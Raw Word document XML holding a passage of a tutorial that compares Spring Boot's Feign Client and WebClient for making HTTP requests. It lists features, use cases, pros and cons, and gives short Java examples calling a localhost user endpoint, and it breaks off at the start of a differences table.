        </w:num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When it comes to making HTTP requests in a Spring Boot application, two popular options are </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Feign Client</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Both have their advantages and use cases, but they serve different purposes and are suitable for different types of interactions. Here's a comparison between the two, helping you decide which one to use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323888E3"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1. Feign Client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE84B8D"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Overview:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A726F5"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Feign</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a declarative web service client that makes HTTP requests easier by abstracting away much of the boilerplate code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8E4A77"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It integrates tightly with </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and allows you to define an interface that represents the HTTP API you want to consume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CB7952"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Feign automatically generates the implementation of the interface and performs HTTP requests based on annotations like @RequestMapping, @GetMapping, @PostMapping, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF9FA35"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Key Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24009EAB"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Declarative Syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You define your API with annotations, and Feign automatically implements the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D3D0AD"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Integration with Spring Cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Feign is built with Spring Cloud, so it's ideal for microservices architectures where you need to call other microservices (e.g., for service discovery, load balancing, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F94C6C"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Simplicity</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It abstracts the complexities of making HTTP calls, making it easier to consume APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F5A153"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Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3AE20A"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Microservices Communication</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Feign is often used in Spring Cloud microservices to communicate with other services through HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FE8141"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Simplified API Calling</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ideal when you need to call simple REST APIs and want to avoid writing boilerplate code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B1A2D6"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Built-in Load Balancing</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When used in conjunction with </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Eureka</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ribbon</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for service discovery, Feign automatically handles load balancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC0A7EA"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF66A04"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FeignClient(name = "user-service", url = "http://localhost:8080")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574DE329"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public interface UserServiceClient {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62106F37" w14:textId="77777777" w:rsidR="00FF6B93" w:rsidRPr="008B3EF9" w:rsidRDefault="00FF6B93" w:rsidP="008B3EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B876A39"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GetMapping("/users/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0502CD00"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User getUser(@PathVariable("id") Long id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577F26A1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F9E014"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In the above example, the Feign client UserServiceClient is defined to call the GET /users/{id} API endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64164730"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Pros:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B5FA2B"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Easy to use and configure with minimal boilerplate code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714B1584"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Automatically handles retries, circuit breakers (when combined with </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hystrix</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), and load balancing (when combined with </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ribbon</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6885573F"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Ideal for simple, synchronous REST API calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E70F41C"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Cons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E51C96A"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It’s </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by default, so it may not be the best choice if you need non-blocking or asynchronous operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A8A8EC"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Doesn't provide much control over the HTTP request (like custom headers, timeouts, etc.) beyond what Feign supports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B652F29" w14:textId="77777777" w:rsidR="00FF6B93"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D45ECA9">
          <v:rect id="_x0000_i2796" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CF3866"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2. WebClient:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB3684F"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Overview:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B594F1"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WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the modern, non-blocking, and reactive alternative to </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RestTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring. It’s part of </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and it's designed for making HTTP calls in a non-blocking and asynchronous way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511F86CA"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It supports both </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations, making it more versatile compared to Feign.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4182D7CA"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WebClient also provides extensive customization options for HTTP requests, like adding custom headers, handling cookies, and managing timeouts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539D2E9B"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Key Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5011E26C"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Reactive and Asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Supports non-blocking, reactive programming through the </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mono</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> classes from Project Reactor, making it ideal for scalable applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59283B93"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lastRenderedPageBreak/>
        <w:t>Supports Both Sync and Async</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: While WebClient supports asynchronous operations, it also allows synchronous operations if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77825748"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Flexible and Customizable</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You have more control over the HTTP request and response. You can customize headers, query parameters, cookies, timeouts, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5B600A"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Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides more robust error handling mechanisms with status code and response body processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72803546"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Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B88AFDF"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Reactive/Non-blocking Communication</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: WebClient is ideal when you're building reactive applications that require high scalability or when you're working with WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CFD828"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Asynchronous Communication</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you need non-blocking, asynchronous communication, WebClient is the right choice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A4175A"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Complex Requests/Customizations</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you need more control over the request/response lifecycle, WebClient is better than Feign.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F20A099"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BE03AC"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ervice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719F9B26"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public class UserService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130FED75" w14:textId="77777777" w:rsidR="00FF6B93" w:rsidRPr="008B3EF9" w:rsidRDefault="00FF6B93" w:rsidP="008B3EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6515543A"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private final WebClient webClient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4D3425" w14:textId="77777777" w:rsidR="00FF6B93" w:rsidRPr="008B3EF9" w:rsidRDefault="00FF6B93" w:rsidP="008B3EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72D6720A"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public UserService(WebClient.Builder webClientBuilder) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E1DA8D"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this.webClient = webClientBuilder.baseUrl("http://localhost:8080").build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8A22E0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3468A213" w14:textId="77777777" w:rsidR="00FF6B93" w:rsidRPr="008B3EF9" w:rsidRDefault="00FF6B93" w:rsidP="008B3EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D1E7D4F"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public Mono&lt;User&gt; getUser(Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BA0157"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return this.webClient.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD21E94"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uri("/users/{id}", id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EBE18A"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retrieve()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323859CE"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bodyToMono(User.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D9F22D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622C86FB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614334D5"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In this example, we are using WebClient to asynchronously retrieve a User from a REST endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4EAD90"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Pros:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67655383"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Non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ideal for applications that need to handle large numbers of concurrent requests efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3541BF81"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Provides full control over HTTP requests, including headers, parameters, and body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365C7575"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Can be used in both </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ways, making it versatile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1412C8D2"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Works seamlessly with </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAEE66C"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Cons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CA97AC"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lightly more complex than Feign for simple API calls, especially when you don't need its full functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E298489"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Requires more boilerplate code if you don’t need non-blocking features (for simple use cases).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CE80EB" w14:textId="77777777" w:rsidR="00FF6B93"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94FAB0">
          <v:rect id="_x0000_i2797" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="123488AC"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Key Differences Between Feign Client and WebCli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67"/>
        <w:gridCol w:w="3799"/>
